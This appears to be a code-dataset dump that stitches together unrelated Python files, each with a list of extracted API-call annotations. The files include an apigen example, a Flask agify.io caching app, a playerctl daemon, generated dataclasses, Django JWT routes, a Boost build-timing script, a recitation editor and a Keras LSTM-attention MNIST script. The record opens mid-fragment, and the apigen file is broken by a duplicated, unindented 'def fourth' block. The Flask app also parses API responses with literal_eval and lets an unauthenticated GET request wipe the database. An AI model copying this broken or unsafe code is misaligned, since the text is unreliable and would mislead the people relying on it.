] | [((167, 185), 'omegaconf.OmegaConf.create', 'OmegaConf.create', ([], {}), '()\n', (183, 185), False, 'from omegaconf import OmegaConf\n')] |
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) 2015 <NAME> <<EMAIL>>
# License: MIT (see LICENSE file)
import apigen
class Ordering(apigen.Definition):
    """apigen example definition used to check that commands keep declaration order."""
    @apigen.command()
    def first(self):
        """Return the literal string "first"."""
        return "first"
    @apigen.command()
    def second(self):
        """Return the literal string "second"."""
        return "second"
    @apigen.command()
    def third(self):
        """Return the literal string "third"."""
        return "third"
    @apigen.command()
    def fourth(self):
        """Return the literal string "fourth"."""
        return "fourth"
def fourth(self):
return "fourth"
if __name__ == "__main__":
apigen.run(Ordering)
| [
"apigen.run",
"apigen.command"
] | [((169, 185), 'apigen.command', 'apigen.command', ([], {}), '()\n', (183, 185), False, 'import apigen\n'), ((236, 252), 'apigen.command', 'apigen.command', ([], {}), '()\n', (250, 252), False, 'import apigen\n'), ((305, 321), 'apigen.command', 'apigen.command', ([], {}), '()\n', (319, 321), False, 'import apigen\n'), ((372, 388), 'apigen.command', 'apigen.command', ([], {}), '()\n', (386, 388), False, 'import apigen\n'), ((468, 488), 'apigen.run', 'apigen.run', (['Ordering'], {}), '(Ordering)\n', (478, 488), False, 'import apigen\n')] |
from flask import Flask, request
from flask_sqlalchemy import SQLAlchemy
from ast import literal_eval
import requests
DB = SQLAlchemy()
class Record(DB.Model):
    """One cached agify.io lookup: a name and its predicted age."""
    id = DB.Column(DB.BigInteger, primary_key=True, nullable=False)
    name = DB.Column(DB.String, nullable=False)
    age = DB.Column(DB.SmallInteger, nullable=False)
    def __repr__(self):
        """Human-readable form rendered directly by the listing routes."""
        return f'[Id: {self.id} | Name: {self.name} | Predicted Age: {self.age}]'
def create_app():
    """Application factory: configure the SQLite-backed Flask app and its routes."""
    APP = Flask(__name__)
    APP.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///agify_data.sqlite3'
    DB.init_app(APP)

    @APP.route('/')
    def base():
        # List every stored record (rendered via Record.__repr__).
        all_records = Record.query.all()
        return str(all_records)

    @APP.route('/no_older_than_40')
    def filter_age():
        # List only records whose predicted age is at most 40.
        filtered_records = Record.query.filter(Record.age <= 40).all()
        return str(filtered_records)

    @APP.route('/check_name')
    def check_name():
        # Look up ?name=<name> on agify.io and persist the predicted age.
        BASE_URL = 'https://api.agify.io?name='
        name = request.args['name']
        data = literal_eval(requests.get(BASE_URL + name).text)
        if not Record.query.all():
            last_id = -1
        else:
            # Continue ids from the current maximum.
            last_id = DB.session.query(DB.func.max(Record.id)).first()[0]
        try:
            rec = Record(id=last_id+1, name=name, age=data['age'])
            DB.session.add(rec)
            DB.session.commit()
            return f'Record added: {rec}'
        except Exception as e:
            # Surface the failure in the response rather than a 500 page.
            return str(e)

    @APP.route('/refresh')
    def refresh():
        # Drop and recreate all tables, wiping stored records.
        DB.drop_all()
        DB.create_all()
        return 'Database Refreshed!'
    return APP
if __name__ == '__main__':
create_app().run()
| [
"flask_sqlalchemy.SQLAlchemy",
"requests.get",
"flask.Flask"
] | [((125, 137), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', ([], {}), '()\n', (135, 137), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((471, 486), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (476, 486), False, 'from flask import Flask, request\n'), ((1025, 1054), 'requests.get', 'requests.get', (['(BASE_URL + name)'], {}), '(BASE_URL + name)\n', (1037, 1054), False, 'import requests\n')] |
"""
A daemon to make controlling multiple players easier.
Daemon core, contains the glib event loop
"""
import logging
from functools import partial
import gi
gi.require_version('Playerctl', '2.0')
from gi.repository import Playerctl, GLib
from .utils import get_player_instance, is_player_active
logger = logging.getLogger('core')
PLAYER_SIGNALS = (
'loop-status', 'metadata', 'seeked', 'shuffle', 'volume'
)
class Core:
    """Glue between Playerctl's player manager and the daemon's event publisher.

    Tracks a single "current" player, forwards its signals through
    ``publish_event_callback`` and switches players as they appear,
    vanish or change playback state.
    """
    def __init__(self, publish_event_callback):
        # Index of the current player within player_manager.props.players.
        self.current_player_index = 0
        self.current_player = None
        # Handler ids connected on the current player (for later disconnect).
        self.signal_handlers = []
        self.player_manager = None
        # Callable(event_name, **payload) used to publish events.
        self.publish_event_callback = publish_event_callback

    def set_current_player(self, player):
        """Make *player* current (or unset with None) and rewire its signals."""
        prev_player = self.current_player
        if player is None:
            logger.debug('Unsetting current player')
            self.current_player_index = 0
            self.current_player = None
        else:
            self.current_player_index = self.player_manager.props.players.index(player)
            self.current_player = player
            logger.debug(f'Current player set to [{self.current_player_index}] = {get_player_instance(self.current_player)}')
        if self.current_player != prev_player:
            # Disconnect old handlers and connect to new player
            if prev_player:
                for handler_id in self.signal_handlers:
                    prev_player.disconnect(handler_id)
                self.signal_handlers = []
            if self.current_player:
                for signal_name in PLAYER_SIGNALS:
                    handler_id = self.current_player.connect(
                        signal_name,
                        partial(self.on_current_player_signal, signal_name)
                    )
                    self.signal_handlers.append(handler_id)
            self.publish_event_callback(
                'ctl_player_change',
                instance=get_player_instance(self.current_player)
            )

    def move_current_player_index(self, amount):
        """Cycle the current player by *amount* (wraps around); return its instance name."""
        players = self.player_manager.props.players
        if not players:
            return None
        new_index = (self.current_player_index + amount) % len(players)
        self.set_current_player(players[new_index])
        return get_player_instance(self.current_player)

    def find_first_active_player(self):
        """Return the first managed player that is active, or None."""
        return next(
            (
                player
                for player in self.player_manager.props.players
                if is_player_active(player)
            ),
            None
        )

    def player_init(self, name):
        """Create a Player for *name*, watch its playback status and manage it."""
        player = Playerctl.Player.new_from_name(name)
        player.connect('playback-status', self.on_playback_state_change)
        self.player_manager.manage_player(player)

    def on_current_player_signal(self, event, player, *args):
        """Forward a signal from the current player as a published event."""
        # Unpack GVariants so we can send them over RPC
        args = list(args)
        for i, v in enumerate(args):
            if hasattr(v, 'unpack'):
                args[i] = v.unpack()
        self.publish_event_callback(event, data=args)

    def on_playback_state_change(self, player, state):
        """Publish status changes and switch the current player when appropriate."""
        if player == self.current_player:
            self.publish_event_callback('playback-status', data=[state.value_nick])
            if is_player_active(self.current_player):
                return
        if state == Playerctl.PlaybackStatus.PLAYING:
            # A player that started playing takes over as current.
            self.set_current_player(player)
            return
        active_player = self.find_first_active_player()
        if player == self.current_player and active_player:
            self.set_current_player(active_player)

    def on_player_appeared(self, manager, player):
        """Handle a newly managed player, preferring active players as current."""
        logger.debug(f'Player added: {get_player_instance(player)}')
        players = self.player_manager.props.players
        # Switch to new player if it's active
        active_player = self.find_first_active_player()
        if self.current_player is None:
            self.set_current_player(active_player or players[0])
            return
        if not is_player_active(self.current_player) and active_player:
            self.set_current_player(active_player)
            return
        # Re-set to refresh the stored index after the list changed.
        self.set_current_player(self.current_player)

    def on_player_vanished(self, manager, player):
        """Handle a player disappearing, electing a replacement if it was current."""
        logger.debug(f'Player vanished: {get_player_instance(player)}')
        players = self.player_manager.props.players
        if player != self.current_player:
            # Re-set to refresh the stored index after the list changed.
            self.set_current_player(self.current_player)
            return
        logger.debug('Current player has vanished')
        if not players:
            self.set_current_player(None)
            return
        next_player = players[min(self.current_player_index, len(players) - 1)]
        self.set_current_player(self.find_first_active_player() or next_player)

    def on_name_appeared(self, manager, name):
        """Start managing a player bus name reported by the manager."""
        self.player_init(name)

    def run(self):
        """Wire up the player manager and enter the GLib main loop (blocks)."""
        self.player_manager = Playerctl.PlayerManager()
        self.player_manager.connect('name-appeared', self.on_name_appeared)
        self.player_manager.connect('player-appeared', self.on_player_appeared)
        self.player_manager.connect('player-vanished', self.on_player_vanished)
        for name in self.player_manager.props.player_names:
            self.player_init(name)
        GLib.MainLoop().run()
"logging.getLogger",
"gi.repository.GLib.MainLoop",
"gi.require_version",
"functools.partial",
"gi.repository.Playerctl.Player.new_from_name",
"gi.repository.Playerctl.PlayerManager"
] | [((162, 200), 'gi.require_version', 'gi.require_version', (['"""Playerctl"""', '"""2.0"""'], {}), "('Playerctl', '2.0')\n", (180, 200), False, 'import gi\n'), ((311, 336), 'logging.getLogger', 'logging.getLogger', (['"""core"""'], {}), "('core')\n", (328, 336), False, 'import logging\n'), ((2627, 2663), 'gi.repository.Playerctl.Player.new_from_name', 'Playerctl.Player.new_from_name', (['name'], {}), '(name)\n', (2657, 2663), False, 'from gi.repository import Playerctl, GLib\n'), ((4949, 4974), 'gi.repository.Playerctl.PlayerManager', 'Playerctl.PlayerManager', ([], {}), '()\n', (4972, 4974), False, 'from gi.repository import Playerctl, GLib\n'), ((5316, 5331), 'gi.repository.GLib.MainLoop', 'GLib.MainLoop', ([], {}), '()\n', (5329, 5331), False, 'from gi.repository import Playerctl, GLib\n'), ((1704, 1755), 'functools.partial', 'partial', (['self.on_current_player_signal', 'signal_name'], {}), '(self.on_current_player_signal, signal_name)\n', (1711, 1755), False, 'from functools import partial\n')] |
from dataclasses import dataclass, field
from enum import Enum
from typing import Optional, Union
class FooTypeValue(Enum):
    """Generated enumeration of the allowed string values for fooType."""
    WA = "WA"
    OR = "OR"
    CA = "CA"
@dataclass
class FooTest:
    """Generated binding for the ``fooTest`` element: an int or a FooTypeValue."""
    class Meta:
        name = "fooTest"

    value: Optional[Union[int, FooTypeValue]] = field(
        default=None,
        metadata={
            # Schema facets: accepted integers are restricted to [100, 200].
            "min_inclusive": 100,
            "max_inclusive": 200,
        }
    )
@dataclass
class Root:
    """Generated binding for the ``root`` element wrapping a required fooTest child."""
    class Meta:
        name = "root"

    foo_test: Optional[Union[int, FooTypeValue]] = field(
        default=None,
        metadata={
            "name": "fooTest",
            "type": "Element",
            "required": True,
            # Schema facets: accepted integers are restricted to [100, 200].
            "min_inclusive": 100,
            "max_inclusive": 200,
        }
    )
| [
"dataclasses.field"
] | [((286, 360), 'dataclasses.field', 'field', ([], {'default': 'None', 'metadata': "{'min_inclusive': 100, 'max_inclusive': 200}"}), "(default=None, metadata={'min_inclusive': 100, 'max_inclusive': 200})\n", (291, 360), False, 'from dataclasses import dataclass, field\n'), ((533, 667), 'dataclasses.field', 'field', ([], {'default': 'None', 'metadata': "{'name': 'fooTest', 'type': 'Element', 'required': True, 'min_inclusive': \n 100, 'max_inclusive': 200}"}), "(default=None, metadata={'name': 'fooTest', 'type': 'Element',\n 'required': True, 'min_inclusive': 100, 'max_inclusive': 200})\n", (538, 667), False, 'from dataclasses import dataclass, field\n')] |
from django.urls import path
from rest_framework_simplejwt.views import TokenRefreshView
from .views import registration, log_in
# Auth endpoints: registration, login, and JWT refresh.
urlpatterns = [
    path('register/', registration, name='register'),
    path('log_in/', log_in, name='log_in'),
    # TokenRefreshView exchanges a valid refresh token for a new access token.
    path('refresh/', TokenRefreshView.as_view(), name='token_refresh'),
]
| [
"django.urls.path",
"rest_framework_simplejwt.views.TokenRefreshView.as_view"
] | [((150, 198), 'django.urls.path', 'path', (['"""register/"""', 'registration'], {'name': '"""register"""'}), "('register/', registration, name='register')\n", (154, 198), False, 'from django.urls import path\n'), ((204, 242), 'django.urls.path', 'path', (['"""log_in/"""', 'log_in'], {'name': '"""log_in"""'}), "('log_in/', log_in, name='log_in')\n", (208, 242), False, 'from django.urls import path\n'), ((265, 291), 'rest_framework_simplejwt.views.TokenRefreshView.as_view', 'TokenRefreshView.as_view', ([], {}), '()\n', (289, 291), False, 'from rest_framework_simplejwt.views import TokenRefreshView\n')] |
#!/usr/bin/python3
# Calculate boost.afio build times under various configs
# (C) 2015 <NAME>
# Created: 12th March 2015
#[ [`--link-test --fast-build debug`][][[footnote ASIO has a link error without `link=static`]][fails]]
#[ [`--link-test debug`][][][]]
#[ [`--link-test --lto debug`][[]][][]]
#[ [`--link-test pch=off debug`][][][]]
#[[`--link-test --fast-build release`][][[footnote ASIO has a link error without `link=static`]][fails]]
#[ [`--link-test release`][][][]]
#[ [`--link-test --lto release`][][][]]
import os, sys, subprocess, time, shutil, platform
# Refuse to run without a toolset argument.
if len(sys.argv) < 2:
    print("Usage: " + sys.argv[0] + " <toolset>", file=sys.stderr)
    sys.exit(1)
# NOTE(review): this only warns — the script keeps going even when b2 is
# missing. Confirm whether an exit was intended here.
if not os.path.exists("b2") and not os.path.exists("b2.exe"):
    print("ERROR: Need to run me from boost root directory please", file=sys.stderr)
    print(os.getcwd())
# Start from a clean build tree so the timings are comparable.
shutil.rmtree("bin.v2", True)
onWindows = "Windows" in platform.system()
# [build flags, elapsed-time-or-"FAILED"] pairs; the second slot is filled below.
configs = [
    ["--c++14 --link-test --fast-build debug", None],
    ["--c++14 --link-test debug", None],
    ["--c++14 --link-test --lto debug", None],
    ["--c++14 --link-test pch=off debug", None],
    ["--c++14 --link-test --fast-build release", None],
    ["--c++14 --link-test release", None],
    ["--c++14 --link-test --lto release", None],
    ["standalone_singleabi", None],
    ["standalone_multiabi", None],
]
for config in configs:
    print("\n\nConfig: " + config[0])
    if config[0] in ("standalone_singleabi", "standalone_multiabi"):
        # Standalone configs drive the bundled all-tests shell/batch scripts.
        if onWindows:
            test_all = "test_all.exe"
            tocall = "alltests_msvc.bat" if "msvc" in sys.argv[1] else "alltests_gcc.bat"
        else:
            test_all = "test_all"
            tocall = "alltests_gcc.sh"
        prefix = "standalone_" if config[0] == "standalone_singleabi" else "multiabi_"
        tocall = prefix + tocall
        basedir = os.getcwd()
        env = dict(os.environ)
        if not onWindows:
            tocall = "./" + tocall
            env['CXX'] = sys.argv[1]
            env['CXX'] = env['CXX'].replace('gcc', 'g++')
            env['CXX'] = env['CXX'].replace('clang', 'clang++')
        try:
            os.chdir("libs/afio")
            shutil.rmtree(test_all, True)
            # Warm-up/validation run: a non-zero exit marks the config FAILED.
            if subprocess.call(tocall, env=env, shell=True):
                config[1] = "FAILED"
                continue
            shutil.rmtree(test_all, True)
            print("\n\nStarting benchmark ...")
            begin = time.perf_counter()
            subprocess.call(tocall, env=env, shell=True)
            end = time.perf_counter()
        finally:
            os.chdir(basedir)
    else:
        # Boost.Build configs go through b2 directly.
        shutil.rmtree("bin.v2/libs/afio", True)
        # Warm-up/validation build (parallel): non-zero exit marks the config FAILED.
        warmup_cmd = [os.path.abspath("b2"), "toolset=" + sys.argv[1], "libs/afio/test", "-j", "8"] + config[0].split(" ")
        if subprocess.call(warmup_cmd):
            config[1] = "FAILED"
            continue
        shutil.rmtree("bin.v2/libs/afio", True)
        print("\n\nStarting benchmark ...")
        begin = time.perf_counter()
        subprocess.call([os.path.abspath("b2"), "toolset=" + sys.argv[1], "libs/afio/test"] + config[0].split(" "))
        end = time.perf_counter()
    mins = int((end - begin) / 60)
    secs = int((end - begin) % 60)
    config[1] = "%dm%ss" % (mins, secs)
    print("Config %s took %dm%ss" % (config[0], mins, secs))
print("\n\n")
for config in configs:
    print(config)
| [
"os.path.exists",
"time.perf_counter",
"os.getcwd",
"shutil.rmtree",
"os.chdir",
"platform.system",
"subprocess.call",
"sys.exit",
"os.path.abspath"
] | [((875, 904), 'shutil.rmtree', 'shutil.rmtree', (['"""bin.v2"""', '(True)'], {}), "('bin.v2', True)\n", (888, 904), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((699, 710), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (707, 710), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((862, 873), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (871, 873), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((931, 948), 'platform.system', 'platform.system', ([], {}), '()\n', (946, 948), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((718, 738), 'os.path.exists', 'os.path.exists', (['"""b2"""'], {}), "('b2')\n", (732, 738), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((747, 771), 'os.path.exists', 'os.path.exists', (['"""b2.exe"""'], {}), "('b2.exe')\n", (761, 771), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((1813, 1824), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1822, 1824), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2444, 2483), 'shutil.rmtree', 'shutil.rmtree', (['"""bin.v2/libs/afio"""', '(True)'], {}), "('bin.v2/libs/afio', True)\n", (2457, 2483), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2651, 2690), 'shutil.rmtree', 'shutil.rmtree', (['"""bin.v2/libs/afio"""', '(True)'], {}), "('bin.v2/libs/afio', True)\n", (2664, 2690), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2741, 2760), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (2758, 2760), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2877, 2896), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (2894, 2896), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2047, 2068), 'os.chdir', 'os.chdir', (['"""libs/afio"""'], {}), "('libs/afio')\n", (2055, 2068), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2075, 2104), 'shutil.rmtree', 'shutil.rmtree', (['test_all', 
'(True)'], {}), '(test_all, True)\n', (2088, 2104), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2114, 2158), 'subprocess.call', 'subprocess.call', (['tocall'], {'env': 'env', 'shell': '(True)'}), '(tocall, env=env, shell=True)\n', (2129, 2158), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2210, 2239), 'shutil.rmtree', 'shutil.rmtree', (['test_all', '(True)'], {}), '(test_all, True)\n', (2223, 2239), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2294, 2313), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (2311, 2313), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2320, 2364), 'subprocess.call', 'subprocess.call', (['tocall'], {'env': 'env', 'shell': '(True)'}), '(tocall, env=env, shell=True)\n', (2335, 2364), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2375, 2394), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (2392, 2394), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2414, 2431), 'os.chdir', 'os.chdir', (['basedir'], {}), '(basedir)\n', (2422, 2431), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2508, 2529), 'os.path.abspath', 'os.path.abspath', (['"""b2"""'], {}), "('b2')\n", (2523, 2529), False, 'import os, sys, subprocess, time, shutil, platform\n'), ((2782, 2803), 'os.path.abspath', 'os.path.abspath', (['"""b2"""'], {}), "('b2')\n", (2797, 2803), False, 'import os, sys, subprocess, time, shutil, platform\n')] |
# -*- coding:utf-8 -*-
from src.Client.Conf.config import *
from src.Client.recitationSystem.editRecitation.tools import editRecitationList, removeRecitation
from src.Client.SystemTools.SaveFiles import saveFiles
class EditRecitation():
    """
    Recitation editing subsystem. Delegates edit and delete operations to
    the tool helpers and persists the resulting list to disk after each
    successful operation.
    """
    def __init__(self, filename='../data/recitation.dat'):
        """Initialise the edit/remove/save tool helpers.

        :param filename: path of the recitation data file to persist to
        """
        # One helper each for in-place edits, removals, and saving to disk.
        self.editRecitationListTools = editRecitationList.EditRecitationList()
        self.removeRecitationTools = removeRecitation.RemoveRecitation()
        self.saveRecitationTools = saveFiles.SaveFiles(filename=filename)

    def edit(self, list, recitationId, question=None, answer=None, isEdit=False, isDelete=False, weight=10):
        """Edit or delete one recitation entry and persist the result.

        :param list: list to be edited
        :param recitationId: id of the target recitation entry
        :param question: new question text (edit only)
        :param answer: new answer text (edit only)
        :param weight: new weight (edit only)
        :param isEdit: perform an edit when True
        :param isDelete: perform a deletion when True
        :return: None (the updated list is written to disk as a side effect)
        """
        try:
            # Respond to each requested operation; both may be requested at once.
            if isEdit:
                # Delegate to the edit subsystem, then persist.
                list = self.editRecitationListTools.edit(list=list, recitationId=recitationId, question=question,
                                                         answer=answer, weight=weight)
                self.saveRecitationTools.saveFiles(list)
            if isDelete:
                # Delegate to the removal subsystem, then persist.
                list = self.removeRecitationTools.remove(list=list, recitationId=recitationId)
                self.saveRecitationTools.saveFiles(list)
        except Exception:
            # Was a bare ``except:``, which also swallowed SystemExit and
            # KeyboardInterrupt; narrowed to Exception.
            if DEBUG and MISSION_DEBUG:
                print('{SYS}{W}{RECITATION_DEBUG} can not edit recitation')
# 测试任务编辑系统
if __name__ == '__main__':
from src.Client.SystemTools.LoadFiles import loadFiles
l = loadFiles.LoadFiles("F:\python17\pythonPro\MemortAssit\data\mission.dat")
list = l.loadFiles(missionType='mission')
print(list)
print()
e = EditRecitation('F:\python17\pythonPro\MemortAssit\data\mission.dat')
# 测试更改完成状态
# e.edit(list, '000025', isFinish=True)
# 测试更改
# e.edit(list, '000025', isEdit=True, bookName='bookTest')
# 测试删除
e.edit(list, '000025', isDelete=True)
print(list)
| [
"src.Client.SystemTools.LoadFiles.loadFiles.LoadFiles",
"src.Client.recitationSystem.editRecitation.tools.editRecitationList.EditRecitationList",
"src.Client.SystemTools.SaveFiles.saveFiles.SaveFiles",
"src.Client.recitationSystem.editRecitation.tools.removeRecitation.RemoveRecitation"
] | [((1787, 1865), 'src.Client.SystemTools.LoadFiles.loadFiles.LoadFiles', 'loadFiles.LoadFiles', (['"""F:\\\\python17\\\\pythonPro\\\\MemortAssit\\\\data\\\\mission.dat"""'], {}), "('F:\\\\python17\\\\pythonPro\\\\MemortAssit\\\\data\\\\mission.dat')\n", (1806, 1865), False, 'from src.Client.SystemTools.LoadFiles import loadFiles\n'), ((398, 437), 'src.Client.recitationSystem.editRecitation.tools.editRecitationList.EditRecitationList', 'editRecitationList.EditRecitationList', ([], {}), '()\n', (435, 437), False, 'from src.Client.recitationSystem.editRecitation.tools import editRecitationList, removeRecitation\n'), ((475, 510), 'src.Client.recitationSystem.editRecitation.tools.removeRecitation.RemoveRecitation', 'removeRecitation.RemoveRecitation', ([], {}), '()\n', (508, 510), False, 'from src.Client.recitationSystem.editRecitation.tools import editRecitationList, removeRecitation\n'), ((546, 584), 'src.Client.SystemTools.SaveFiles.saveFiles.SaveFiles', 'saveFiles.SaveFiles', ([], {'filename': 'filename'}), '(filename=filename)\n', (565, 584), False, 'from src.Client.SystemTools.SaveFiles import saveFiles\n')] |
# -*- coding: utf-8 -*-
from __future__ import print_function
import keras
from keras.datasets import mnist
from keras.models import Model
from keras.layers import Input, Dense, TimeDistributed
from keras import initializers,regularizers,activations,constraints
from keras.engine.topology import Layer,InputSpec
from keras.layers import LSTM
import matplotlib.pyplot as plt
class SelfAttention(Layer):
    # Attention model (Attention layer: Self Attention).
    # Learns a softmax weight per position from the input itself and
    # multiplies those weights back onto the input element-wise.
    def __init__(self,
                 activation=None,
                 kernel_initializer='glorot_uniform',
                 kernel_regularizer=None,
                 kernel_constraint=None,
                 **kwargs):
        """Create the layer; the keyword options mirror keras.layers.Dense."""
        # Keras convention: allow `input_dim` as shorthand for `input_shape`.
        if 'input_shape' not in kwargs and 'input_dim' in kwargs:
            kwargs['input_shape'] = (kwargs.pop('input_dim'),)
        super(SelfAttention, self).__init__(**kwargs)
        # Resolve string identifiers into keras callables/config objects.
        self.activation = activations.get(activation)
        self.kernel_initializer = initializers.get(kernel_initializer)
        self.kernel_regularizer = regularizers.get(kernel_regularizer)
        self.kernel_constraint = constraints.get(kernel_constraint)
        self.input_spec = InputSpec(ndim=2)
        self.supports_masking = True
    def build(self, input_shape):
        # Build an inner Sequential that maps the input to per-position
        # softmax attention weights, then repeats/permutes them back to the
        # input's shape so call() can multiply element-wise.
        # NOTE(review): time_steps and dimensions both read input_shape[1];
        # for a 3-D (batch, time, features) input one of them presumably
        # should be input_shape[2] — confirm against the intended input rank.
        time_steps = input_shape[1]
        dimensions = input_shape[1]
        self.attention = keras.models.Sequential(name='attention')
        self.attention.add(keras.layers.Dense(dimensions,
                                              input_shape=(
                                                  time_steps, dimensions,),
                                              kernel_initializer=self.kernel_initializer,
                                              kernel_regularizer=self.kernel_regularizer,
                                              kernel_constraint=self.kernel_constraint))
        self.attention.add(keras.layers.Activation(self.activation))
        # Collapse to a single score per position, softmax over positions.
        self.attention.add(keras.layers.Dense(1,
                                              kernel_initializer=self.kernel_initializer,
                                              kernel_regularizer=self.kernel_regularizer,
                                              kernel_constraint=self.kernel_constraint))
        self.attention.add(keras.layers.Flatten())
        self.attention.add(keras.layers.Activation('softmax'))
        # Broadcast the weights back to the feature dimension.
        self.attention.add(keras.layers.RepeatVector(dimensions))
        self.attention.add(keras.layers.Permute([2, 1]))
        # Old-style (Keras < 2.3) weight registration: expose the inner
        # model's weights as this layer's weights.
        self.trainable_weights = self.attention.trainable_weights
        self.non_trainable_weights = self.attention.non_trainable_weights
        self.built = True
    def call(self, inputs):
        # Element-wise product of the input with its learned attention map.
        attention = self.attention(inputs)
        return keras.layers.Multiply()([inputs, attention])
    def compute_output_shape(self, input_shape):
        # Attention weighting does not change the tensor shape.
        return input_shape
    def get_config(self):
        # Serialize constructor arguments so the layer can be re-created
        # from a saved model config.
        config = {
            'activation': activations.serialize(self.activation),
            'kernel_initializer': initializers.serialize(self.kernel_initializer),
            'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
            'kernel_constraint': constraints.serialize(self.kernel_constraint),
        }
        return dict(config)
def Lstm_Attention(x_train,x_test,batch_size,num_classes,epochs,y_train,y_test):
    """Build, train, visualise and evaluate the LSTM + self-attention model.

    Relies on the module-level globals ``row``, ``col``, ``pixel``,
    ``row_hidden`` and ``col_hidden`` for the input geometry and the
    hidden-layer sizes.
    """
    # ---- model definition ----
    inputs = Input(shape=(row, col, pixel))                     # input layer
    row_encoding = TimeDistributed(LSTM(row_hidden))(inputs)    # TimeDistributed layer (row-wise LSTM)
    col_encoding = LSTM(col_hidden)(row_encoding)               # LSTM hidden layer
    attended = SelfAttention()(col_encoding)                    # attention layer
    outputs = Dense(num_classes, activation='softmax')(attended)  # softmax classification output
    model = Model(inputs, outputs)
    model.compile(loss='categorical_crossentropy',
                  optimizer='rmsprop',
                  metrics=['accuracy'])

    # ---- training ----
    history = model.fit(x_train, y_train,
                        batch_size=batch_size,
                        epochs=epochs,
                        verbose=1,
                        validation_data=(x_test, y_test))

    # ---- visualise the training curves with matplotlib ----
    curve_specs = (
        (211, 'acc', 'val_acc', 'model accuracy', 'accuracy'),
        (212, 'loss', 'val_loss', 'model loss', 'loss'),
    )
    for position, train_key, val_key, plot_title, y_label in curve_specs:
        plt.subplot(position)
        plt.plot(history.history[train_key])
        plt.plot(history.history[val_key])
        plt.title(plot_title)
        plt.ylabel(y_label)
        plt.xlabel('epoch')
        plt.legend(['train', 'test'], loc='best')
    plt.show()

    # ---- final evaluation on the held-out test set ----
    scores = model.evaluate(x_test, y_test, verbose=0)
    print('Test loss:', scores[0])
    print('Test accuracy:', scores[1])
batch_size = 256 # batch size
num_classes = 10 # number of target classes
epochs = 50 # number of training epochs
# Hidden sizes for the row-wise and column-wise LSTMs.
row_hidden = 128
col_hidden = 128
# Load MNIST and reshape each sample to (28, 28, 1) row/col/pixel form.
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(x_train.shape[0], 28, 28, 1)
x_test = x_test.reshape(x_test.shape[0], 28, 28, 1)
# Normalize the 0-255 pixel values to [0, 1] floats.
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# One-hot encode the labels for categorical_crossentropy.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
# Input geometry consumed (as globals) by Lstm_Attention.
row, col, pixel = x_train.shape[1:]
if __name__ == "__main__":
    Lstm_Attention(x_train,x_test,batch_size,num_classes,epochs,y_train,y_test)
"keras.engine.topology.InputSpec",
"matplotlib.pyplot.ylabel",
"keras.activations.get",
"keras.utils.to_categorical",
"keras.layers.Activation",
"keras.layers.Dense",
"keras.datasets.mnist.load_data",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"keras.constraints.serialize",
"keras.lay... | [((4891, 4908), 'keras.datasets.mnist.load_data', 'mnist.load_data', ([], {}), '()\n', (4906, 4908), False, 'from keras.datasets import mnist\n'), ((5244, 5292), 'keras.utils.to_categorical', 'keras.utils.to_categorical', (['y_train', 'num_classes'], {}), '(y_train, num_classes)\n', (5270, 5292), False, 'import keras\n'), ((5302, 5349), 'keras.utils.to_categorical', 'keras.utils.to_categorical', (['y_test', 'num_classes'], {}), '(y_test, num_classes)\n', (5328, 5349), False, 'import keras\n'), ((3409, 3439), 'keras.layers.Input', 'Input', ([], {'shape': '(row, col, pixel)'}), '(shape=(row, col, pixel))\n', (3414, 3439), False, 'from keras.layers import Input, Dense, TimeDistributed\n'), ((3756, 3776), 'keras.models.Model', 'Model', (['x', 'prediction'], {}), '(x, prediction)\n', (3761, 3776), False, 'from keras.models import Model\n'), ((4123, 4139), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', (4134, 4139), True, 'import matplotlib.pyplot as plt\n'), ((4144, 4176), 'matplotlib.pyplot.plot', 'plt.plot', (["history.history['acc']"], {}), "(history.history['acc'])\n", (4152, 4176), True, 'import matplotlib.pyplot as plt\n'), ((4181, 4217), 'matplotlib.pyplot.plot', 'plt.plot', (["history.history['val_acc']"], {}), "(history.history['val_acc'])\n", (4189, 4217), True, 'import matplotlib.pyplot as plt\n'), ((4222, 4249), 'matplotlib.pyplot.title', 'plt.title', (['"""model accuracy"""'], {}), "('model accuracy')\n", (4231, 4249), True, 'import matplotlib.pyplot as plt\n'), ((4254, 4276), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""accuracy"""'], {}), "('accuracy')\n", (4264, 4276), True, 'import matplotlib.pyplot as plt\n'), ((4281, 4300), 'matplotlib.pyplot.xlabel', 